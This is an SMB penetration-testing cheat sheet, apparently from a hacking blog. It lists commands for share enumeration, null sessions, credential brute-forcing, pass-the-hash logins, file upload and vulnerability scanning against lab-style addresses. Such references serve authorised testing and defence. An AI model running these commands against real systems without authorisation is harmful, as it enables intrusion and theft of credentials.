SMB Enumeration
smbmap -H 10.10.10.10 //Check Privileges
smbmap -H 10.10.10.10 -R --depth 5
smbclient -L //10.10.10.10/ //List Shares
smbclient //10.10.10.10/Users //Interactive shell to a share
smbclient \\\\10.10.10.10\\share$ //Open a Null Session
smbclient //friendzone.htb/general -U "" //See files inside
smbclient -N -L //10.10.10.10/ //List Shares as Null User
psexec.py [email protected] //Enter pass later
smbmap -u Administrator -p '[email protected]' -H 10.10.10.10
smbclient -U 'administrator%[email protected]' \\\\10.10.10.10\\c$
#Once logged in:
put filename //Can upload any file
#Access SMB shares via Windows CMD
net view \\192.168.1.17 /All
#Using Kerberos ticket with Smbclient
smbclient -k -L //10.10.10.10/
#Basic SMB & OS info
crackmapexec smb 10.10.10.10
#List Shares
crackmapexec smb 10.10.10.10 --shares
#If the password needs to be changed
smbpasswd -U username -r 10.10.10.10
#Access SMB using a hash
smbclient //10.10.10.10/NAME -U username --pw-nt-hash 07772ae654432cd618915793515asds
#Starting SMB Server
sudo smbserver.py share "$(pwd)"
#Brute forcing SMB Creds
crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt
#Passing blank creds via SMB
crackmapexec smb 10.10.10.10 --shares -u '' -p ''
#Bruteforcing SMB using hashes
proxychains crackmapexec -t 15 smb 10.10.10.10 -u users -H hashes --no-bruteforce --continue-on-success
SMB Enum using Nmap
#SMB Users Enum
nmap --script smb-enum-users.nse -p445 IP_Address
#SMB OS Discovery
nmap --script smb-os-discovery IP_Address
#SMB Shares Enum
nmap --script smb-enum-shares -p139,445 IP_Address
nmap --script smb-enum-shares IP_Address
#SMB Vuln Scan
nmap --script "smb-vuln*" IP_Address
#SMB Shares Enum using RPCClient
rpcclient -U "" -N IP_Address
netshareenum
netshareenumall
#Enum Using Metasploit
use auxiliary/scanner/smb/smb_enumshares
set rhosts IP_Address
exploit
Article source: https://www.hackingdream.net/2022/06/smb-pentest-checklist.html